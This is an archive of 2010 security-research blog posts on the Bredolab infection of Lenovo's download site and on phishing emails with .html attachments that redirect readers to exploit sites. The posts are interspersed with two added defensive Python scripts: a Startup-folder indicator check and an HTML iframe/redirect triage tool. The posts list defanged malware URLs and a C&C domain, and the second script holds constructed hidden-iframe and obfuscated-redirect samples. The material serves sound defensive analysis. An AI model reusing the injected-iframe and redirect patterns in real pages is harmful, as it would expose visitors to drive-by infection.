Archive for June, 2010

Jun 28 2010

Lenovo’s download site can now be safely accessed

Published under Security Research

In a recent blog entry, we posted a warning that Lenovo’s download website had been infected with malicious code. According to Lenovo, the site was infected between late Friday, June 18 and Monday, June 21. After Bkis’ warning, Lenovo removed the malicious code from the site and officially informed users of the issue on its blog.

However, many users may well have accessed the site between June 18 (when the malicious code was injected) and June 21 (when Lenovo dealt with the issue), so there is a real chance that their computers have been infected. If you visited the download site during this period, how can you tell whether your computer is infected? One simple check is Windows’ msconfig: if the Startup tab lists a startup item named “monskc32”, your computer has been infected:

Figure 1: Indicator of whether your system is infected with Bredolab

If your computer is infected with Bredolab, update your antivirus software to the latest version to remove the malicious code.

Le Minh Hung

Senior Security Researcher

http://blog.bkis.com/en/lenovo-download-site-infected-with-bredolab-botnet/


Jun 25 2010

Twitter is still hackers’ “tasty bait”

Published under Security Research

Recently, we have issued several warnings about the risk of virus infection when users open files attached to phishing emails targeting popular social networking sites such as Facebook or Twitter. However, users still seem indifferent to such warnings, which explains why this infection method remains effective for hackers and why new waves of attacks using it keep emerging. This time, Twitter is being exploited.

Figure 1: Phishing emails targeting Twitter.

The attacker’s ultimate goal is to convince you that these emails are genuine and then trick you into opening the attached file. Without due caution you will easily follow the hacker’s script, and as a result your computer gets infected with a virus.

This virus (detected by Bkav as W32.Ziktwitters.Worm) downloads many other pieces of malware, including FakeAV, and constantly sends advertising emails as well as phishing emails to other users.

Figure 2: Virus distributes advertising emails and phishing emails.

The virus author seems to be someone with a sense of humor, judging by the very funny data decryption code he chose :)

Figure 3: Data decryption

Obviously, it is users’ carelessness in handling information from the Internet, in particular opening unknown files without any idea whether the email is authentic, that helps hackers spread viruses so widely.

Nguyen Cong Cuong

Senior Malware Researcher


Jun 21 2010

Lenovo’s download site infected with Bredolab botnet

Published under Security Research

General information

Lenovo’s download site has been infected with malicious code since Sunday afternoon, June 20, so users should be careful when visiting it. Currently, if you access the site with Chrome or Firefox, you will see a warning like the following:

Chrome’s warning of malicious code on Lenovo’s download site

Many web pages on Lenovo’s download site have had an iframe appended that sends visitors to hxxp://volgo-marun.cn/pek/index.php

Malicious code appended to web pages

Decoding the iframe, we find that a number of Internet Explorer vulnerabilities are exploited to launch the attack.

Exploit codes

These exploit codes attempt to load the file hxxp://volgo-marun.cn/pek/exe.exe, which is a virus, onto the victim’s computer.

Virus’ information

The virus is a new variant of the Bredolab botnet, with the following MD5: F5A44C63F8777F544931ABC763F88EE3

Once loaded onto a computer, the virus copies itself to %Programs%\Startup\monskc32.exe and receives commands from a C&C server at the domain sicha-linna8.com.

Bredolab Botnet receives commands from C&C server
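The two host indicators given here (a dropper named monskc32.exe in the Startup folder, and the MD5 above) are the same ones the June 28 follow-up tells readers to look for in msconfig. The script below is an added example, not a Bkis tool, that performs that check and distinguishes a name match from a hash match. The Startup folder locations are the standard Windows ones and are an assumption; the demo folder created at the bottom is constructed (placeholder bytes, not the real sample) so the logic can be exercised on any machine.

```python
"""Host-side check for the Bredolab indicators given in this post: a copy of the
dropper named monskc32.exe in the Windows Startup folder, with the MD5 published
above.  Added example, not a Bkis tool.  Startup folder paths are the standard
Windows ones (an assumption); the demo folder is constructed for testing."""
import hashlib
import os
import tempfile
from pathlib import Path

KNOWN_NAME = 'monskc32.exe'
KNOWN_MD5 = 'f5a44c63f8777f544931abc763f88ee3'   # MD5 from the post, lower-cased


def md5_of(path, chunk=1 << 16):
    """Hex MD5 of a file, read in chunks so large files need not fit in memory."""
    h = hashlib.md5()
    with open(path, 'rb') as f:
        for block in iter(lambda: f.read(chunk), b''):
            h.update(block)
    return h.hexdigest()


def candidate_startup_dirs():
    """Standard per-user and all-users Startup folders (Vista/7 layout first, then
    the XP layout).  Assumption: default profile paths.  Only existing folders
    are returned, so on a non-Windows host this is an empty list."""
    env = os.environ
    tail = Path('Start Menu') / 'Programs' / 'Startup'
    cands = []
    for var in ('APPDATA', 'PROGRAMDATA'):
        if env.get(var):
            cands.append(Path(env[var]) / 'Microsoft' / 'Windows' / tail)
    for var in ('USERPROFILE', 'ALLUSERSPROFILE'):
        if env.get(var):
            cands.append(Path(env[var]) / tail)
    return [p for p in cands if p.is_dir()]


def scan_startup_dir(directory, known_name=KNOWN_NAME, known_md5=KNOWN_MD5):
    """Return (path, verdict) for each file in the folder matching an indicator:
    'known-sample'  name and MD5 both match the published sample,
    'name-match'    name only: probably a rebuilt variant, still treat as infected,
    'hash-match'    MD5 only: the same file under another name.
    Files matching neither are not reported (msconfig's Startup tab lists them)."""
    hits = []
    for p in sorted(Path(directory).iterdir()):
        if not p.is_file():
            continue
        name_hit = p.name.lower() == known_name.lower()
        hash_hit = md5_of(p) == known_md5.lower()
        if name_hit and hash_hit:
            hits.append((str(p), 'known-sample'))
        elif name_hit:
            hits.append((str(p), 'name-match'))
        elif hash_hit:
            hits.append((str(p), 'hash-match'))
    return hits


def make_demo_startup_dir():
    """Constructed stand-in for a Startup folder on an infected machine: a harmless
    desktop.ini, a file carrying the dropper's name (not its content), and the
    same placeholder bytes under another name.  Returns the folder path."""
    d = Path(tempfile.mkdtemp(prefix='startup-demo-'))
    (d / 'desktop.ini').write_bytes(b'[.ShellClassInfo]\r\n')
    (d / KNOWN_NAME).write_bytes(b'abc')   # placeholder; MD5 900150983cd24fb0d6963f7d28e17f72
    (d / 'readme.txt').write_bytes(b'abc')
    return str(d)


if __name__ == '__main__':
    # Real Startup folders when run on Windows, the constructed demo folder otherwise.
    for d in candidate_startup_dirs() or [make_demo_startup_dir()]:
        hits = scan_startup_dir(d)
        print(f'{d}: ' + ('no indicator match' if not hits else
                           ', '.join(f'{p} [{v}]' for p, v in hits)))
```

A name match without a hash match is the expected outcome for a recompiled build of the same family, so it should be read as “infected, different build”, not as a false alarm; a clean result from this script only says that these two indicators are absent, and the antivirus update recommended above is still the way to remove the malware.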

At the time of writing, the scan result on VirusTotal shows that only 10 of 40 AV engines detect this variant.

http://www.virustotal.com/analisis/a49993e5639068504df90dace96a809b41153fe528751bd6b8f0eef9e4085959-1277144604

Bkav’s users need not worry, as this virus has already been added to our antivirus database.

Le Minh Hung

Senior Security Researcher


Jun 18 2010

Skype, Twitter and Facebook continue to be impersonated to spread viruses

Published under Security Research

In the previous blog entry, we described a new trend in spreading malicious code. Over the past few days, our system has continuously collected many new malicious samples spread via emails masquerading as coming from big names like Skype, Twitter and Facebook. According to the VirusTotal scan result, many antivirus programs do not detect these .html files.

VirusTotal scan result:

http://www.virustotal.com/analisis/7877f3490e33edab50bea5ad33669d424c5b7777c359a36ee6dcfa6ab9d18be0-1276808217

Even the antivirus programs of established mail services such as Gmail or Yahoo Mail are bypassed.

Bypass Gmail’s AV

Bypass Yahoo Mail’s AV

That is why these malicious codes have spread so widely in the past few days.

Le Minh Hung

Senior Security Researcher


Jun 16 2010

New trend of spreading malicious code via email to bypass mail server antivirus

Published under Security Research

In the last few days, Bkis’ monitoring system has detected a large virus-spreading campaign that sends spam emails with .html files attached. The spam emails masquerade as notification messages from Twitter, Facebook, Microsoft, etc.

Fake Twitter

Fake Facebook

And fake Outlook setup notification

The email subjects are varied:

“Reset your Twitter password”
“Reset your Facebook password”
“Outlook Setup Notification”
“FIFA World Cup South Africa… bad news”
..

The attachments carry names such as:

news.html
open.html
index.html
ecard.html
facebook_newpass.html
..

The .html files contain scripts similar to the following:

Thus, when the attachment is opened, the user is redirected to a website hosting malicious code that exploits flaws in Adobe products, Java and IE to download viruses onto the computer. Opening an .html attachment should be regarded as accepting the hacker’s invitation to visit a malicious website.

This method is becoming a dangerous new trend, for the following reasons:

1. So far, most viruses spreading via email have used attachments such as .exe, .zip or .pif files, and many users have become wary of these. With .html attachments, however, most users assume the files are safe.

2. Moreover, .html attachments can bypass the antivirus programs integrated in mail servers, because the .html file itself contains no malicious or exploit code, only a link to a website set up by the hacker. It is therefore hard for antivirus programs to detect.
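Both of the delivery tricks described on this page come down to a small piece of HTML that merely sends the browser somewhere else: the hidden iframe appended to the Lenovo download pages, and the .html attachments here that contain only a redirect. The script below is an added example, not Bkis code, that triages such HTML: it reports iframes pointing off-site (and whether they are hidden), meta-refresh redirects and script redirects, after first looking through two common string obfuscations (unescape()/%XX sequences and String.fromCharCode()). The sample HTML is constructed and uses placeholder hosts (malicious.example, phish.example, download.example), not the real domains from the posts.

```python
"""Triage helper for suspicious HTML: a saved web page that may carry an injected
<iframe>, or an e-mail .html attachment that only redirects the reader elsewhere.
Added example, not Bkis code; the sample HTML at the bottom is constructed."""
import re
from urllib.parse import unquote, urlparse

IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.I)
SRC_RE = re.compile(r'src\s*=\s*["\']?([^"\'\s>]+)', re.I)
HIDDEN_RE = re.compile(
    r'(?:width|height)\s*=\s*["\']?0(?:px)?\b|display\s*:\s*none|visibility\s*:\s*hidden',
    re.I)
META_TAG_RE = re.compile(r'<meta\b[^>]*>', re.I)
REFRESH_RE = re.compile(r'http-equiv\s*=\s*["\']?refresh', re.I)
URL_IN_CONTENT_RE = re.compile(r'url\s*=\s*["\']?([^"\'>\s;]+)', re.I)
JS_REDIRECT_RE = re.compile(
    r'(?:window\.|document\.|top\.|self\.)?location(?:\.href|\.replace|\.assign)?'
    r'\s*(?:=|\()\s*["\']([^"\']+)["\']', re.I)
PERCENT_RE = re.compile(r'(?:%[0-9a-fA-F]{2})+')
FROMCHARCODE_RE = re.compile(r'String\.fromCharCode\(\s*([\d\s,]+)\)', re.I)


def deobfuscate(text):
    """Decode %XX runs and String.fromCharCode(...) lists in place, so an iframe
    written via document.write(unescape("%3Ciframe...")) becomes visible to the
    tag regexes.  Crude by design: legitimate %XX in hrefs is decoded too, which
    is harmless for triage."""
    text = PERCENT_RE.sub(lambda m: unquote(m.group(0)), text)
    text = FROMCHARCODE_RE.sub(
        lambda m: ''.join(chr(int(n)) for n in m.group(1).split(',') if n.strip()),
        text)
    return text


def is_offsite(url, expected_host):
    """True if url has a host that is neither expected_host nor a subdomain of it.
    Pass expected_host='' for an e-mail attachment: there any absolute URL is suspect."""
    host = (urlparse(url).hostname or '').lower()
    expected = expected_host.lower()
    return bool(host) and host != expected and not host.endswith('.' + expected)


def analyse_html(html, expected_host):
    """Return (kind, url, note) findings; kind is 'iframe' or 'redirect'."""
    findings = []
    text = deobfuscate(html)
    for m in IFRAME_RE.finditer(text):
        attrs = m.group(1)
        src = SRC_RE.search(attrs)
        if src and is_offsite(src.group(1), expected_host):
            note = 'hidden' if HIDDEN_RE.search(attrs) else 'visible'
            findings.append(('iframe', src.group(1), note))
    for tag in META_TAG_RE.findall(text):
        if REFRESH_RE.search(tag):
            url = URL_IN_CONTENT_RE.search(tag)
            if url and is_offsite(url.group(1), expected_host):
                findings.append(('redirect', url.group(1), 'meta refresh'))
    for m in JS_REDIRECT_RE.finditer(text):
        if is_offsite(m.group(1), expected_host):
            findings.append(('redirect', m.group(1), 'script'))
    return findings


# Constructed stand-in for an injected download page: the site's own content, then
# a zero-size iframe appended after </html>.
INJECTED_PAGE = (
    '<html><body><h1>Drivers</h1><a href="/drivers/x.exe">x.exe</a></body></html>\n'
    '<iframe src="http://malicious.example/pek/index.php" width=0 height=0></iframe>'
)

# Constructed stand-in for a spam .html attachment: no exploit code of its own, only
# a meta refresh, a script redirect and an iframe hidden behind unescape().
ATTACHMENT = (
    '<html><head><meta http-equiv="refresh" content="0;url=http://phish.example/go">'
    '</head><body>\n'
    '<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fphish.example'
    '%2Fin.php%22%20style%3D%22display%3Anone%22%3E%3C%2Fiframe%3E"));</script>\n'
    '<script>window.location.href = "http://phish.example/go";</script></body></html>'
)

if __name__ == '__main__':
    for label, html, host in (('saved page', INJECTED_PAGE, 'download.example'),
                              ('attachment', ATTACHMENT, '')):
        for kind, url, note in analyse_html(html, host):
            print(f'{label}: {kind} -> {url} ({note})')
```

For a saved copy of a site you operate, pass the site’s own host so that same-origin frames are ignored and only foreign destinations are reported; for an attachment there is no legitimate host, so every absolute destination is a finding. Note that this catches the page’s point exactly: the attachment is flagged for where it sends the reader, not for any exploit code it contains, which is why a signature-based mail gateway lets it through.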

We therefore recommend that users be wary of any file attached to an unknown email. Users should also regularly update the software on their computers and install an antivirus program for protection.

Le Minh Hung

Senior Security Researcher

